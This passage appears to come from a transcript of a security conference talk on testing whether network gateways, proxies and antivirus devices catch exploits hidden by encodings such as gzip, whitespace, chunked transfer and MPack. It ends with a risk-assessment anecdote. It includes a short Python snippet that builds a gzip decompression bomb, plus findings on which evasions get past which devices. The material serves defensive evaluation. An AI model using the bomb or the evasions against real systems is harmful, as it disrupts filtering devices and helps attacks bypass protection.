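# data compresses absurdly well, so a tiny transfer forces the proxy or
# AV engine to inflate something huge. Scaled down from "a terabyte of
# zeros" to 10 MB so it runs quickly.

def make_gzip_bomb(uncompressed_size):
    """Return a small gzip blob that inflates to uncompressed_size zeros."""
    return gzip.compress(b"\x00" * uncompressed_size)

bomb = make_gzip_bomb(10_000_000)  # 10 MB of zeros in memory...
# ...ships as only a few kilobytes on the wire
```

Any inline gateway that transparently decompresses content has to pay the full inflation cost for those few kilobytes, which is exactly why proxies choke on it.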
Obviously most things don't catch HTTPS unless they're doing an SSL man-in-the-middle, like Blue Coat and some other devices. So it runs through all the tests, goes through all the possible permutations, and tells you what happened. In the results here we can see there were three exploits that were actually blocked, indicated by "broken," and the rest all passed right through. So simple things like adding white space, or the MPack encoding, were able to evade in some cases. Here are four quick examples: graphs of that same data, run on four different device types. It's interesting when you look at it from a distance like this, because you can almost see patterns; different devices' engines have different ways of looking at the exploits and the encoding and doing something with them. So let's drill down into a couple of those. Here's one: it's a managed service provider, and they have a custom IPS device that's supposed to do stuff. What we see is that they block plain exploits, and they even handle a couple of encodings like white space and chunked, but they do nothing with JavaScript and nothing with gzip. So if you gzip it, everything goes through. If it's plain, they catch 80%. Next one: a proxy device running antivirus. What we see is it's really bad at catching the exploit itself, but really good at catching the encoding mechanism. Something like MPack they pick up every single time, regardless of what the content is; they just figure, if it's MPack encoded, we kill it. But then they're only like 50% effective when you actually do something with the MPack encoding, like adding white space to it. So you can see the effectiveness drops off pretty quickly. So the Astaro guys, they do a good job.
And one of the interesting things from theirs is that they actually don't manage to stop anything except the gzip stuff. It was the only device I tested where, if you didn't send an Accept-Encoding: gzip header, they actually flagged it as a problem when you got gzip data back. So, an interesting thing, but they didn't actually stop any of the other exploits, all on a fully updated system. And then my last test. I'm running this through on a couple of different device types; I've got my switch, I've got my device connected out to the internet, and I run it. I'm like, holy crap, this is the best device I've tested. It catches everything. This is awesome. So I keep pumping information in, then I look down, and... it's the wireless. The cable's not even plugged in. So yeah, actually unplugging the cable is incredibly effective. And we have a little bit of time here. We weren't really sure if we were going to make this on target, so I didn't tell you my favorite risk assessment story. About 10 years ago when I was 15... okay, about 35 years ago when I was 15... 50... okay, 36 years ago to be exact, when I was 15, I worked for my father in his body shop. He went out to lunch, and back in those days he usually had a liquid lunch. In fact, to this day he still has liquid lunches, but that's cool. He comes back into the shop, and I have a car jacked up and I'm working underneath it, and I don't have any jack stands, okay? I just have a floor jack, a nice solid hydraulic floor jack, and I'm under the car working on it. He grabs my foot, pulls me out from under the car, pounds the shit out of me, takes a bite out of my ass, and explains to me that no, chances are the car is not going to fall, but if it does fall, you might get hurt. Here's a guy that didn't have a high school diploma, here's a guy that just had common sense, but he had more common sense than a lot of CISOs that I see, okay? Yeah, you can clap, go ahead.
Shortly after that I went a different way; I actually became a cop. But in my third year on the job I got a call where a guy was under a car in a body shop and the car had fallen on him. He wasn't using jack stands. So we are not really good at risk; we're not really good at figuring out what risk is. To me it wasn't risky at all being under there. I mean, the chances are one in a million it's going to fall on me, but if it fell on me it would have killed me, just like it killed that other guy. So you guys that have to answer to all these policies, and all the modeling that you see out there, all the competition for your money: just step back and ask, does this make sense to me? And I think you'll go a lot further, okay? And so one last comment I wanted to add: one of my goals with eScan and the exploitability testing is to be able to go out and actually profile a wide range of devices, because I think what we're going to find is that seeing what they can block today tells us a lot about what they might be able to block in the future. So it's actually a bit more predictive and more useful in that sense than it is in just knowing what can be sent through. So let's open up to questions; we have the question room later as well, so anything...